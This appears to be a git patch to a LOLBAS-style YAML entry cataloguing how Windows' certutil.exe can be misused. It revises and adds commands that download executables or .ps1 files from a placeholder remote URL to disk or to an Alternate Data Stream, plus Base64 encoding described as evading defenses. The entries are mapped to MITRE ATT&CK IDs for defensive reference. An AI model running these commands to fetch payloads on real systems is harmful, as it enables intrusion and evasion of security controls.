From d5ce81d2c8485bfa2240401a7118e777860256ff Mon Sep 17 00:00:00 2001 From: LocalLoopBack <38758896+Snausage0x45@users.noreply.github.com> Date: Mon, 26 May 2025 13:16:10 -0700 Subject: [PATCH] Update Certutil.yml with new flag and update previous flag (#402) --- yml/OSBinaries/Certutil.yml | 26 ++++++++++++++++++++------ 1 file changed, 20 insertions(+), 6 deletions(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 3dc75b1..916762c 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -4,27 +4,36 @@ Description: Windows binary used for handling certificates Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: certutil.exe -urlcache -split -f {REMOTEURL:.exe} {PATH:.exe} - Description: Download and save executable to disk in the current folder. + - Command: certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe} + Description: Download and save an executable to disk in the current folder. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil.exe -verifyctl -f -split {REMOTEURL:.exe} {PATH:.exe} - Description: Download and save executable to disk in the current folder. + - Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe} + Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not. Usecase: Download file from Internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - - Command: certutil.exe -urlcache -split -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt - Description: Download and save a PS1 file to an Alternate Data Stream (ADS). + - Command: certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt + Description: Download and save a .ps1 file to an Alternate Data Stream (ADS). Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream Category: ADS Privileges: User MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 + - Command: certutil.exe -URL {REMOTEURL:.exe} + Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + OperatingSystem: Windows 10, Windows 11 + Tags: + - Application: GUI - Command: certutil -encode {PATH} {PATH:.base64} Description: Command to encode a file using Base64 Usecase: Encode files to evade defensive measures @@ -65,6 +74,7 @@ Resources: - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 - Link: https://twitter.com/mattifestation/status/620107926288515072 - Link: https://twitter.com/egre55/status/1087685529016193025 + - Link: https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/ Acknowledgement: - Person: Matt Graeber Handle: '@mattifestation' @@ -73,3 +83,7 @@ Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Lior Adar + - Person: Adam + Handle: '@hexacorn' + - Person: SomeTestLeper + Handle: '@SomeTestLeper'